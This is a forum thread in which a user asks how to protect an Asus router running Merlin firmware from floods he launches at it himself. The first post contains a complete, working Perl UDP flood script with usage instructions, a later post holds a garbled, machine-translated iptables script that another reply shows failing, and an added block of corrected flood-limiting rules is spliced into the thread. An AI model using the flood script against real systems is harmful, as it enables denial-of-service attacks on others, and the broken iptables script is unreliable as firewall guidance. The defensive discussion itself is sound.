RT-AC66U_B1 PERL ATTACK

Discussion in 'Asuswrt-Merlin' started by Miguel, Apr 21, 2017 at 5:01 AM.

  1. Miguel

    Miguel Occasional Visitor

    Joined:
    Mar 29, 2017
    Messages:
    10
    Hello everyone, I am a little desperate with my router and the Merlin firmware. I am testing DDoS attacks with a script in Perl and my WAN and LAN are falling. I have the firewall and DDoS options enabled, but is it impossible to configure some script in jffs to prevent the router from saturating itself?
    I need help, please.

    perl ddos.pl xx.xx.xx.xx 0 1 10
    Code:
    
    #!/usr/bin/perl
    
    #Args
    # 1 - IP
    # 2 - Port
    # 3 - Size of the packet to send
    # 4 - Time in secondes
    
    use Socket;
    use strict;
    
    if ($#ARGV != 3) {
      print "-Tip on use : perl DDoS.pl 8.8.8.8 80 2048 500\n";
      exit(1);
    }
    
    my ($ip,$port,$size,$time) = @ARGV;
    my ($iaddr,$endtime,$psize,$pport);
    $iaddr = inet_aton("$ip") or die "Cannot connect to $ip\n";
    $endtime = time() + ($time ? $time : 1000000);
    socket(flood, PF_INET, SOCK_DGRAM, 17);
    print "~To cancel the attack press \'Ctrl-C\'\n\n";
    print "|IP|\t\t |Port|\t\t |Size|\t\t |Time|\n";
    print "|$ip|\t |$port|\t\t |$size|\t\t |$time|\n";
    print "To cancel the attack press 'Ctrl-C'\n" unless $time;
    for (;time() <= $endtime;) {
      $psize = $size ? $size : int(rand(1500-64)+64) ;
      $pport = $port ? $port : int(rand(65500))+1;
    
      send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
     
  2. john9527

    john9527 Part of the Furniture

    Joined:
    Mar 28, 2014
    Messages:
    4,136
    Location:
    United States
    If you have DROPPED packet logging turned on during your test, try turning off all packet logging. I've seen that the syslog flood can cause problems.
     
  3. Miguel

    Logged packets type (NONE)
     
  4. ColinTaylor

    ColinTaylor Part of the Furniture

    Joined:
    Mar 31, 2014
    Messages:
    2,530
    Location:
    UK
    You need to be testing this from the internet side. It won't work if you're testing from your LAN.
     
  5. RMerlin

    RMerlin Part of the Furniture

    Joined:
    Apr 14, 2012
    Messages:
    22,042
    Location:
    Canada
    And running Perl on the router's limited CPU and RAM is probably not a good idea either.
     
  6. Miguel

    I am sending the attack from a VPS to my home, where the Asus router is, with a connection of 100 Mbps, but my connection is 300 Mbps. It seems to be overloading the router with packets.
     
  7. Miguel

    When I launch my attack and the router becomes accessible again, I see these logs.

    Code:
    Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= MAC=50:32:75:e7:6d:a4:00:17:10:8b:d2:87:08:00 SRC=IP VPS DST=IP ASUS LEN=29 TOS=0x00 PREC=0x00 TTL=46 ID=1539 DF PROTO=UDP SPT=34309 DPT=57378 LEN=9
    Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= MAC=50:32:75:e7:6d:a4:00:17:10:8b:d2:87:08:00 SRC=IP VPS DST=IP ASUS LEN=29 TOS=0x00 PREC=0x00 TTL=46 ID=65474 DF PROTO=UDP SPT=34309 DPT=46671 LEN=9
    Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= MAC=50:32:75:e7:6d:a4:00:17:10:8b:d2:87:08:00 SRC=IP VPS DST=IP ASUS LEN=29 TOS=0x00 PREC=0x00 TTL=46 ID=4599 DF PROTO=UDP SPT=34309 DPT=63405 LEN=9
    I have hundreds of equal entries. I think the router is not able to block so many packets. I have a more basic router and it supports the load better.
     
  8. john9527

    I thought you said you had packet logging off????
     
    cybrnook likes this.
  9. Miguel

    I activated it so that you could see the log, but it is always disabled.
     
  10. Miguel

    I loaded the script on the Asus router.

    But without results. Sadly, I bought the router thinking it would solve some of the problems with my attacks, but I see that I threw the money away.
    Code:
    
    Como utilizar # Se Declara El Golpe de la ONU de Como
    
    #!/bin/bash
    
    # Create the files where the IPs for the blacklists will be stored;
    
    iptables -A -m listanegra Reciente --name blacklist_180 --rcheck --seconds 180 "Denegar Los Paquetes De Las Direcciones IP ingresadas Por Un Negra La Lista 180 segundos" -m comentario --comment -j DROP
    
    # Stop ICMP flood
    # Create the chain for ICMP flood
    iptables -N cadena-ICMP-inundación
    
    # Jump to the chain when ICMP is detected
    iptables -p icmp -j Entrada Cadena-ICMP-Inundaciones
    
    # Leave the chain if the packet rate from the same IP is below 4 per second with a burst of 8 per second
    iptables -A -m Límite-Cadena ICMP-inundación --limit 4 / s --limit-burst 8 -m comentario --comment "margen de Límite ICMP" -j RETORNO
    
    # Log as flood when the rate is higher
    iptables -A cadena-ICMP-inundación Límite -m --limit 6 / h --limit-burst 1 -j LOG --log-prefijo "Cortafuegos: Probable inundación ICMP"
    
    # Blacklist the IP for 3 minutes
    iptables -A cadena-ICMP-inundación -m Reciente --name blacklist_180 --set -m comentario --comment "ListaNegra origen IP" -j DROP
    
    # Stop UDP floods
    
    # Create the chain for UDP floods
    iptables -N cadena-udp-inundación
    
    # Jump to the chain when UDP is detected
    iptables -A ENTRADA udp p -j Cadena-UDP-Inundaciones
    
    # Limit the UDP rate to 10/second with a limit of 20
    iptables -A -m Límite Cadena-UDP-inundación --limit 10 / s --limit estallar-20 -m comentario --comment "Limite Velocidad UDP" -j RETURN
    
    # Log
    iptables -A Límite -m cadena-udp-inundación --limit 6 / h --limit-burst 1 -j LOG --log-prefijo "Cortafuegos: Probable inundación udp"
    
    # Deny flooders for 3 minutes
    iptables -A cadena-UDP-inundación -m Reciente --name blacklist_180 --set -m comentario --comment "ListaNegra origen IP" -j DROP
    
    # Stop SYN floods
    
    # Create the syn-flood chain
    iptables -N cadena-syn-inundación
    
    # Jump to the syn-flood chain when the packet is detected
    iptables -p TCP ENTRADA --syn -J Cadena-syn-Inundaciones
    
    # Limit the packet rate to 2 per second, with a burst of 6 per second
    iptables -A -m Límite Cadena-syn-inundación --limit 2 / s --limit-burst 6 -m comentario --comment "Limitar Velocidad TCP SYN" -j RETURN
    
    # Log flooders
    iptables -A Límite -m cadena-syn-inundación --limit 6 / h --limit-burst 1 -j LOG --log-prefijo "Cortafuegos: Probable inundación syn"
    
    # Ban flooders for 3 minutes
    iptables -A cadena-syn-inundación -m Reciente --name blacklist_180 --set -m Comentar --comment soltar "IP de origen de Lista negra" -j
    
    # Stop other types of SYN flood attacks
    iptables -p tcp ENTRADA! --syn comentario -m NUEVO --comment estado -m --state "Cortar La Conexión TCP SYN Que No empiezan por" -j DROP
     
  11. ColinTaylor

    I hope you are not trying to use that script because it is full of errors.
    Code:
    # iptables -A -m listanegra Reciente --name blacklist_180 --rcheck --seconds 180 "Denegar Los Paquetes De Las Direcciones IP ingresadas Por Un Negra La Lista 180 segundos" -m comentario --comment -j DROP
    Bad argument `listanegra'
    Try `iptables -h' or 'iptables --help' for more information.
    
    # iptables -N cadena-ICMP-inundacin
    
    # iptables -p icmp -j Entrada Cadena-ICMP-Inundaciones
    Bad argument `Cadena-ICMP-Inundaciones'
    Try `iptables -h' or 'iptables --help' for more information.
    
    # iptables -A -m Lmite-Cadena ICMP-inundacin --limit 4 / s --limit-burst 8 -m comentario --comment "margen de Lmite ICMP" -j RETORNO
    Bad argument `Lmite-Cadena'
    Try `iptables -h' or 'iptables --help' for more information.
    
    #
     
  12. Miguel

    Maybe that does not work. Is there any script that I can load on the Asus? My knowledge of iptables is scarce. Is there any way to avoid a SYN flood? The iptables rules that it brings by default do drop, but the router gets saturated and I lose the WAN and LAN.
    Sorry for my bad English.


    When I launch the attack from the VPS to my home, the Asus router's LAN gateway does not respond to ping until the attack ends.
     
    Last edited: Apr 21, 2017 at 4:29 PM
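
The rules the script in post 10 appears to be aiming for, written with valid iptables syntax, as an added example that is not from any poster in this thread or from the Asuswrt-Merlin project. The chain names, the log prefix and the `IPT` dry-run variable are illustrative, and it assumes the firmware's iptables build includes the `limit`, `recent` and `state` matches and the `LOG` target, which the thread does not confirm.

```shell
#!/bin/sh
# Added example: flood-limiting rules in valid iptables syntax.
# IPT defaults to a dry run that only prints each command; set IPT=iptables
# (as root) to apply them. Chain names and log prefix are illustrative.
IPT="${IPT:-echo iptables}"
BL="blacklist_180"   # name of the "recent" list, as in the posted script

# flood_chain NAME RATE BURST MATCH...
# Creates chain NAME, sends INPUT packets matching MATCH to it, returns the
# ones under RATE/BURST, logs the excess (capped at 6 entries per hour so the
# syslog is not flooded as well) and blacklists the source address.
flood_chain() {
    name=$1 rate=$2 burst=$3
    shift 3
    $IPT -N "$name"
    $IPT -A INPUT "$@" -j "$name"
    # "limit" is one token bucket for the whole rule, not one per source IP,
    # so under load legitimate senders can exceed it and be blacklisted too.
    $IPT -A "$name" -m limit --limit "$rate" --limit-burst "$burst" -j RETURN
    $IPT -A "$name" -m limit --limit 6/h --limit-burst 1 \
         -j LOG --log-prefix "Probable $name: "
    $IPT -A "$name" -m recent --name "$BL" --set -j DROP
}

emit_flood_rules() {
    # Drop anything from a source blacklisted within the last 180 seconds.
    # -A appends: these rules only take effect if no earlier INPUT rule
    # has already accepted or dropped the packet.
    $IPT -A INPUT -m recent --name "$BL" --rcheck --seconds 180 -j DROP
    flood_chain icmp-flood 4/s 8 -p icmp
    flood_chain udp-flood 10/s 20 -p udp
    flood_chain syn-flood 2/s 6 -p tcp --syn
    # A new TCP connection has to start with a SYN.
    $IPT -A INPUT -p tcp ! --syn -m state --state NEW -j DROP
}

emit_flood_rules
```

These rules only decide what the router does with a packet after it has arrived, so they do not reduce the traffic reaching the WAN interface.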
  13. ChatmanR

    ChatmanR Occasional Visitor

    Joined:
    Nov 13, 2009
    Messages:
    24
    Because this message has the words "perl attack" in the link, I had to disable my Avast A/V just to view and post... good luck with your script.
     
